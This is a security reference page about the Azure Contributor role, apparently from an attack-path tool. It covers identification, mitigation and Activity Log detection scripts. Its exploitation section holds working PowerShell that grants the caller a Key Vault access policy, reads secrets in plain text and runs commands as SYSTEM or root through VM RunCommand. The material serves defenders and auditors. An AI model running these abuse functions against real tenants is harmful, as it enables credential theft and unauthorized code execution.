AZ_CONTRIBUTOR
Summary
FSProtect ACL Alias: AZ_CONTRIBUTOR
Azure Alias: Contributor (Azure RBAC)
Affected Object Types: Subscriptions, Resource Groups, VMs, Key Vaults, Automation Accounts, and other ARM resources
Exploitation Certainty: Certain
Azure RBAC Role: Contributor (b24988ac-6180-42a0-ab88-20f7382dd24c); full resource write access, but cannot assign roles
Description
AZ_CONTRIBUTOR represents an Azure Resource Manager Contributor role assignment. Contributor grants full management-plane control over every resource within the assignment's scope, with a few exceptions:
Full management-plane access to the target resources (create, update, delete).
Cannot assign roles: unlike Owner, Contributor excludes Microsoft.Authorization/*/Write, Microsoft.Authorization/*/Delete and Microsoft.Authorization/elevateAccess/Action, so it cannot write role assignments or elevate its own access.
Cannot grant itself data-plane access through Azure RBAC, but on resources that keep their own authorization model (Key Vault access policies, storage account keys) it can usually obtain that access by other means.
The Contributor role is highly dangerous because it enables direct abuse of many resource types:
Key Vault
Add an access policy granting yourself data-plane rights, then read secrets, keys and certificates. This only works on vaults that use the legacy access-policy model; a vault with Azure RBAC authorization enabled needs a role assignment, which Contributor cannot create.
Automation Account
Create or edit runbooks that run under the account's identity; harvest legacy Run As certificates or managed identity tokens from inside the runbook.
Virtual Machine
Run commands as SYSTEM (Windows) or root (Linux) via RunCommand.
Web App / Function App
Deploy code, then request managed identity tokens from the app's identity endpoint.
Storage Account
List the account keys (Microsoft.Storage/storageAccounts/listKeys/action), then read/write blobs, tables and queues.
Identification
PowerShell (Az Module)
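The following script is an added example (not code from the original page or from FSProtect): it enumerates every Contributor assignment visible to the current Az session, classifies each by scope depth, and flags the combination that deserves review first, a broad scope held by a user or service principal rather than a group. It assumes Az.Accounts and Az.Resources are installed and Connect-AzAccount has already been run.

```powershell
# Added example (not part of the original page). Assumes Az.Accounts and Az.Resources
# are installed and Connect-AzAccount has been run with at least Reader on the subscriptions.
#Requires -Modules Az.Accounts, Az.Resources

$ContributorRoleId = 'b24988ac-6180-42a0-ab88-20f7382dd24c'

function Get-ScopeLevel {
    param([string]$Scope)
    # Classify the assignment scope by its depth in the ARM hierarchy.
    # Order matters: the resource pattern must be tested before the resource-group pattern.
    switch -Regex ($Scope) {
        '^/providers/Microsoft\.Management/managementGroups/' { return 'ManagementGroup' }
        '^/subscriptions/[^/]+/resourceGroups/[^/]+/providers/' { return 'Resource' }
        '^/subscriptions/[^/]+/resourceGroups/[^/]+$'            { return 'ResourceGroup' }
        '^/subscriptions/[^/]+$'                                 { return 'Subscription' }
        '^/$'                                                    { return 'Root' }
        default                                                  { return 'Unknown' }
    }
}

function Get-ContributorAssignments {
    $results = foreach ($sub in Get-AzSubscription) {
        $null = Set-AzContext -SubscriptionId $sub.Id
        # Get-AzRoleAssignment returns direct assignments in the subscription plus those
        # inherited from management groups and the root scope. Filter on the role GUID rather
        # than the display name so custom roles named "Contributor" are not confused with it.
        Get-AzRoleAssignment | Where-Object { $_.RoleDefinitionId -eq $ContributorRoleId } | ForEach-Object {
            $level = Get-ScopeLevel $_.Scope
            [pscustomobject]@{
                Subscription = $sub.Name
                Principal    = $_.DisplayName
                SignInName   = $_.SignInName
                ObjectType   = $_.ObjectType    # User, Group, ServicePrincipal
                ObjectId     = $_.ObjectId
                ScopeLevel   = $level
                Scope        = $_.Scope
                # Broad scope held directly by a non-group principal is the first thing to review.
                HighRisk     = ($level -in 'Root', 'ManagementGroup', 'Subscription') -and ($_.ObjectType -ne 'Group')
            }
        }
    }
    # Inherited assignments repeat once per subscription under the same management group.
    $results | Sort-Object ObjectId, Scope -Unique
}

Get-ContributorAssignments | Sort-Object HighRisk -Descending |
    Format-Table Subscription, Principal, ObjectType, ScopeLevel, Scope, HighRisk -AutoSize
```

Group-held assignments are not harmless; they are just one step removed, so follow up on the group membership with Get-AzADGroupMember for any group that appears at subscription or management-group scope.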
Azure GUI
Open Azure Portal → Subscriptions (or the target resource).
Go to Access control (IAM) → Role assignments.
Filter by Role = Contributor.
Review all principals listed.
Exploitation
Contributor grants full management-plane control over the resources in its scope. Unlike Owner it cannot assign roles, so escalation runs through the resources themselves (the paths below) rather than through RBAC.
Related Attack Paths:
AZ_EXECUTE_COMMAND — Contributor on VMs can execute commands as SYSTEM via RunCommand.
AZ_KEY_VAULT_CONTRIBUTOR — Contributor on Key Vaults can modify access policies to grant data-plane access.
AZ_GET_SECRETS — After modifying access policies, read Key Vault secrets.
AZ_GET_KEYS — After modifying access policies, read Key Vault keys.
AZ_GET_CERTIFICATES — After modifying access policies, read Key Vault certificates.
AZ_VM_CONTRIBUTOR — Contributor on VMs enables the same VM abuses as VM Contributor.
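The two paths the page names most often, Key Vault access-policy abuse and VM RunCommand, as an added example that is not part of the original page or of FSProtect. It assumes Az.KeyVault and Az.Compute are loaded, that Connect-AzAccount was run as the principal holding Contributor, and that the vault, resource group and VM names in the usage lines are placeholders. The Key Vault function checks the vault's permission model first, because the access-policy path does not exist on RBAC-mode vaults.

```powershell
# Added example (not part of the original page). Assumes an Az session authenticated as the
# Contributor principal; all resource names below are placeholders.
#Requires -Modules Az.Accounts, Az.KeyVault, Az.Compute

function Invoke-KeyVaultAccessPolicyAbuse {
    param(
        [Parameter(Mandatory)][string]$VaultName,
        [Parameter(Mandatory)][string]$PrincipalObjectId,  # object id of the Contributor principal
        [string]$SecretName                                 # omit to list secret names only
    )
    $vault = Get-AzKeyVault -VaultName $VaultName
    # Caveat: access policies only exist on vaults using the legacy permission model. With
    # Azure RBAC authorization enabled, data-plane access needs a role assignment, and
    # Contributor cannot write those (Microsoft.Authorization/*/Write is excluded).
    if ($vault.EnableRbacAuthorization) {
        throw "$VaultName uses Azure RBAC authorization; the access-policy path does not apply."
    }
    # Contributor holds Microsoft.KeyVault/vaults/accessPolicies/write (management plane),
    # so it can grant its own principal data-plane rights. This write is logged.
    Set-AzKeyVaultAccessPolicy -VaultName $VaultName -ObjectId $PrincipalObjectId `
        -PermissionsToSecrets get, list -PermissionsToKeys get, list -PermissionsToCertificates get, list
    if ($SecretName) {
        # Data-plane call; succeeds only once the policy above is in place.
        Get-AzKeyVaultSecret -VaultName $VaultName -Name $SecretName -AsPlainText
    } else {
        Get-AzKeyVaultSecret -VaultName $VaultName | Select-Object Name, Enabled, Updated
    }
}

function Invoke-VmRunCommandAbuse {
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$VMName
    )
    $vm = Get-AzVM -ResourceGroupName $ResourceGroupName -Name $VMName
    # RunCommand runs the script as SYSTEM on Windows and as root on Linux.
    if ($vm.StorageProfile.OsDisk.OsType -eq 'Windows') {
        $commandId = 'RunPowerShellScript'
        $script    = 'whoami; hostname'
    } else {
        $commandId = 'RunShellScript'
        $script    = 'id; hostname'
    }
    $tmp = New-TemporaryFile
    Set-Content -Path $tmp.FullName -Value $script
    try {
        $result = Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName `
            -CommandId $commandId -ScriptPath $tmp.FullName
        # Value[0] carries stdout, Value[1] stderr.
        $result.Value[0].Message
    } finally {
        Remove-Item $tmp.FullName -ErrorAction SilentlyContinue
    }
}

# Usage (placeholder names). (Get-AzADUser -SignedIn).Id resolves the current user's object id;
# for a service principal session pass its object id explicitly.
# Invoke-KeyVaultAccessPolicyAbuse -VaultName 'kv-prod' -PrincipalObjectId (Get-AzADUser -SignedIn).Id -SecretName 'db-password'
# Invoke-VmRunCommandAbuse -ResourceGroupName 'rg-app' -VMName 'vm-app-01'
```

Both actions leave Activity Log entries (Microsoft.KeyVault/vaults/accessPolicies/write and Microsoft.Compute/virtualMachines/runCommand/action), which is what the Detection section keys on; a vault with a firewall or private endpoint may still reject the data-plane read even after the policy change.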
Mitigation
Minimize Contributor assignments
Go to Azure Portal → target resource → Access control (IAM) → Role assignments.
Filter by Contributor and remove any principal that does not strictly require broad access.
Prefer more specific built-in roles (e.g., Reader, Virtual Machine User Login, Key Vault Secrets User).
Use Privileged Identity Management (PIM) for just-in-time access
Configure eligible (not permanent) assignments for the Contributor role.
Require approval and MFA for activation.
Scope assignments narrowly
Assign Contributor at the resource group or resource level rather than subscription level.
Audit with Azure Policy
Use Azure Policy to audit, and once the exceptions are known deny, assignments of broad built-in roles such as Contributor at subscription scope.
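The re-scoping and policy steps above, as an added example (not code from the original page or from FSProtect). It assumes Az.Resources is loaded and the session holds Owner or User Access Administrator on the subscription (Contributor itself cannot write role assignments), and that the Azure Policy alias Microsoft.Authorization/roleAssignments/roleDefinitionId is available in the tenant; the role name, scope and policy names are placeholders.

```powershell
# Added example (not part of the original page). Assumes Owner / User Access Administrator on the
# subscription and the policy alias Microsoft.Authorization/roleAssignments/roleDefinitionId.
#Requires -Modules Az.Accounts, Az.Resources

$ContributorRoleId = 'b24988ac-6180-42a0-ab88-20f7382dd24c'

function Convert-ContributorToScopedRole {
    param(
        [Parameter(Mandatory)][string]$ObjectId,        # principal holding the broad assignment
        [Parameter(Mandatory)][string]$SubscriptionId,
        [Parameter(Mandatory)][string]$NewRoleName,     # e.g. 'Key Vault Secrets User'
        [Parameter(Mandatory)][string]$NewScope         # resource group or resource ID
    )
    $subScope = "/subscriptions/$SubscriptionId"
    if ($NewScope -notlike "$subScope/*") {
        throw "NewScope must be a resource group or resource inside $subScope"
    }
    # Grant the narrow role first so the principal never loses access entirely.
    New-AzRoleAssignment -ObjectId $ObjectId -RoleDefinitionName $NewRoleName -Scope $NewScope | Out-Null
    # Remove only the direct subscription-scope Contributor assignment. Get-AzRoleAssignment -Scope
    # also returns assignments inherited from management groups; those must be fixed at their own scope.
    Get-AzRoleAssignment -ObjectId $ObjectId -Scope $subScope |
        Where-Object { $_.RoleDefinitionId -eq $ContributorRoleId -and $_.Scope -eq $subScope } |
        ForEach-Object { Remove-AzRoleAssignment -InputObject $_ }
}

function New-ContributorAuditPolicy {
    param([Parameter(Mandatory)][string]$SubscriptionId)
    $subScope = "/subscriptions/$SubscriptionId"
    # Audit rather than deny so the policy can be rolled out without breaking existing automation;
    # switch "effect" to "deny" once the legitimate exceptions are known.
    $rule = @"
{
  "if": {
    "allOf": [
      { "field": "type", "equals": "Microsoft.Authorization/roleAssignments" },
      { "field": "Microsoft.Authorization/roleAssignments/roleDefinitionId",
        "like": "*/roleDefinitions/$ContributorRoleId" }
    ]
  },
  "then": { "effect": "audit" }
}
"@
    # Mode "All" is required for role assignments, which are not resource-group-indexed resources.
    $definition = New-AzPolicyDefinition -Name 'audit-contributor-assignments' `
        -DisplayName 'Audit Contributor role assignments' -Policy $rule -Mode All
    New-AzPolicyAssignment -Name 'audit-contributor-assignments' -Scope $subScope `
        -PolicyDefinition $definition
}

# Usage (placeholder values):
# Convert-ContributorToScopedRole -ObjectId '<principal-object-id>' -SubscriptionId '<sub-id>' `
#     -NewRoleName 'Key Vault Secrets User' `
#     -NewScope '/subscriptions/<sub-id>/resourceGroups/rg-app/providers/Microsoft.KeyVault/vaults/kv-prod'
# New-ContributorAuditPolicy -SubscriptionId '<sub-id>'
```

Eligible (PIM) assignments are configured through Entra ID Privileged Identity Management rather than through these cmdlets; the re-scoping function above is for the permanent assignments that should not exist at all.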
Detection
Monitor Contributor role assignments and privileged actions in the Azure Activity Log.
Go to Azure Portal → Monitor → Activity log.
Filter by Operation name, for example Microsoft.Authorization/roleAssignments/write. Note that this event does not name the role in its operation name; the role appears as roleDefinitionId inside the event's request body, so match that against b24988ac-6180-42a0-ab88-20f7382dd24c.
Alert on:
New Contributor role assignments at subscription scope (Microsoft.Authorization/roleAssignments/write).
RunCommand executions on VMs (Microsoft.Compute/virtualMachines/runCommand/action).
Access policy changes on Key Vaults (Microsoft.KeyVault/vaults/accessPolicies/write).
Runbook creation or modification in Automation Accounts (Microsoft.Automation/automationAccounts/runbooks/write and Microsoft.Automation/automationAccounts/runbooks/draft/write).
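The alert list above turned into a filter over Activity Log records, as an added example (not code from the original page or from FSProtect). The sample records are constructed to mirror the shape Get-AzActivityLog returns (OperationName.Value, Status.Value, Caller, ResourceId, Properties.Content); in production, feed the function real records instead. The subscription ID, caller names and resource IDs in the samples are made up.

```powershell
# Added example (not part of the original page). Sample events below are constructed, not real log data.
$ContributorRoleId = 'b24988ac-6180-42a0-ab88-20f7382dd24c'

# Operation names corresponding to the abuses Contributor enables.
$WatchedOperations = @{
    'Microsoft.Authorization/roleAssignments/write'               = 'Role assignment written'
    'Microsoft.Compute/virtualMachines/runCommand/action'          = 'VM RunCommand executed'
    'Microsoft.KeyVault/vaults/accessPolicies/write'               = 'Key Vault access policy changed'
    'Microsoft.Automation/automationAccounts/runbooks/write'       = 'Runbook created or modified'
    'Microsoft.Automation/automationAccounts/runbooks/draft/write' = 'Runbook draft modified'
}

function Find-ContributorAbuseEvents {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $op = $e.OperationName.Value
        if (-not $WatchedOperations.ContainsKey($op)) { continue }
        # Each operation produces Started/Succeeded/Failed entries; count only the successful one.
        if ($e.Status.Value -ne 'Succeeded') { continue }
        $reason = $WatchedOperations[$op]
        if ($op -eq 'Microsoft.Authorization/roleAssignments/write') {
            # The operation name does not say which role; the request body carries roleDefinitionId
            # and the assignment scope is the ResourceId with the roleAssignments suffix removed.
            $scope = $e.ResourceId -replace '/providers/Microsoft\.Authorization/roleAssignments/.*$', ''
            $bodyText = $e.Properties.Content['requestbody']
            if (-not $bodyText) {
                # Body can be absent or truncated; surface it anyway so an analyst resolves the role.
                $reason = 'Role assignment written (role not in event; check with Get-AzRoleAssignment)'
            } else {
                $body   = $bodyText | ConvertFrom-Json
                $roleId = ($body.Properties.RoleDefinitionId -split '/')[-1]
                if ($roleId -ne $ContributorRoleId) { continue }
                if ($scope -notmatch '^/subscriptions/[^/]+$') { continue }
                $reason = 'Contributor assigned at subscription scope'
            }
        }
        [pscustomobject]@{
            Time     = $e.EventTimestamp
            Caller   = $e.Caller
            Reason   = $reason
            Resource = $e.ResourceId
        }
    }
}

# Constructed sample records mirroring Get-AzActivityLog output (not real log data).
$sub = '11111111-1111-1111-1111-111111111111'
$readerRoleId = 'acdd72a7-3385-48ef-bd42-f606fba81ae7'
function New-SampleRoleAssignmentEvent([string]$RoleId, [string]$Scope, [string]$Caller) {
    $body = @{ Properties = @{ PrincipalId = 'aaaaaaaa-0000-0000-0000-000000000001'; PrincipalType = 'User'
                               RoleDefinitionId = "/subscriptions/$sub/providers/Microsoft.Authorization/roleDefinitions/$RoleId"
                               Scope = $Scope } } | ConvertTo-Json -Depth 5
    [pscustomobject]@{
        EventTimestamp = [datetime]'2024-05-01T10:00:00Z'; Caller = $Caller
        OperationName  = @{ Value = 'Microsoft.Authorization/roleAssignments/write' }
        Status         = @{ Value = 'Succeeded' }
        ResourceId     = "$Scope/providers/Microsoft.Authorization/roleAssignments/bbbbbbbb-0000-0000-0000-000000000002"
        Properties     = @{ Content = @{ requestbody = $body } }
    }
}
$SampleEvents = @(
    New-SampleRoleAssignmentEvent $ContributorRoleId "/subscriptions/$sub" 'alice@contoso.com'          # alert
    New-SampleRoleAssignmentEvent $readerRoleId "/subscriptions/$sub/resourceGroups/rg-app" 'bob@contoso.com'  # ignored
    [pscustomobject]@{ EventTimestamp = [datetime]'2024-05-01T10:05:00Z'; Caller = 'svc-deploy'
        OperationName = @{ Value = 'Microsoft.Compute/virtualMachines/runCommand/action' }
        Status = @{ Value = 'Succeeded' }
        ResourceId = "/subscriptions/$sub/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm-app-01"
        Properties = @{ Content = @{} } }                                                               # alert
    [pscustomobject]@{ EventTimestamp = [datetime]'2024-05-01T10:06:00Z'; Caller = 'alice@contoso.com'
        OperationName = @{ Value = 'Microsoft.KeyVault/vaults/accessPolicies/write' }
        Status = @{ Value = 'Started' }
        ResourceId = "/subscriptions/$sub/resourceGroups/rg-app/providers/Microsoft.KeyVault/vaults/kv-prod"
        Properties = @{ Content = @{} } }                                                               # ignored (not Succeeded)
)
Find-ContributorAbuseEvents -Events $SampleEvents | Format-Table -AutoSize
```

To run it against live data, replace $SampleEvents with the output of Get-AzActivityLog -StartTime (Get-Date).AddDays(-1) -MaxRecord 1000 from the Az.Monitor module; the same operation names work as the filter in a Log Analytics or Sentinel query over the AzureActivity table.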